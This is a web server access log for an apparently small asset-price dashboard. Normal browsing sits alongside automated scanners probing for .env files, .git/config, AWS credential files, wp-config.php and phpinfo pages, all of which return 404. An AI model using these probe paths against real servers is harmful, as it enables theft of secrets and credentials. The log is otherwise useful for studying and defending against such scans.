[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:47 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 2.58.56.62] [Length 0] [Gzip -] [Sent-to ] "-" "-"
[15/Feb/2026:02:58:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
[15/Feb/2026:02:58:56 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:58:56 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:58:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:58:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:58:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 211.234.204.1] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:58:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/apple-touch-icon.png" [Client 211.234.204.1] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:58:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:58:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 211.234.204.1] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:59:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 1900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:02:59:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 948] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:03:00:17 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 1419] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:03:00:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:03:01:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 2838] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:03:42:53 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
[15/Feb/2026:03:42:53 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:03:42:53 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:03:42:53 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:03:42:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 475] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:03:46:23 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/%22/static/js/app.js%22" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 195.178.110.132] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[15/Feb/2026:03:46:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[15/Feb/2026:03:46:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws-config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_debugbar/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/debugbar/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/debug/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[15/Feb/2026:03:46:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[15/Feb/2026:03:46:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws-credentials" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.json" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:03:46:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.s3cfg" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[15/Feb/2026:03:46:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-"
[15/Feb/2026:03:46:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
[15/Feb/2026:04:11:52 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:04:11:53 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:04:39:26 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[15/Feb/2026:04:39:27 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:04:39:27 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:04:39:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:04:39:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:04:39:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:04:39:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3294] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:07:32:18 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 136.112.154.46] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-"
[15/Feb/2026:07:57:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 34.122.92.195] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-"
[15/Feb/2026:07:57:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 34.122.92.195] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-"
[15/Feb/2026:07:58:26 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 34.122.92.195] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "YourUserAgentHere" "-"
[15/Feb/2026:09:11:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 2.57.122.173] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" "-"
[15/Feb/2026:09:51:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[15/Feb/2026:09:51:16 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:09:51:16 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:09:51:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:09:51:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:09:51:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:09:51:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:09:51:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:09:51:51 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3297] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:10:51:04 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
[15/Feb/2026:10:51:04 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:10:51:04 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:10:51:04 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:10:51:04 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:10:51:04 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:10:51:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:13:45:54 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/config" [Client 173.212.204.156] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
[15/Feb/2026:13:45:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 173.212.204.156] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "http://asset.hanmocnn.co.kr/.git/config"
[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-G900A Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36" "-"
[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; CrOS x86_64 11647.154.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.114 Safari/537.36" "-"
[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/awsconfig.js" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.98 Chrome/71.0.3578.98 Safari/537.36" "-"
[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.production" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 9; ONEPLUS A3010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-"
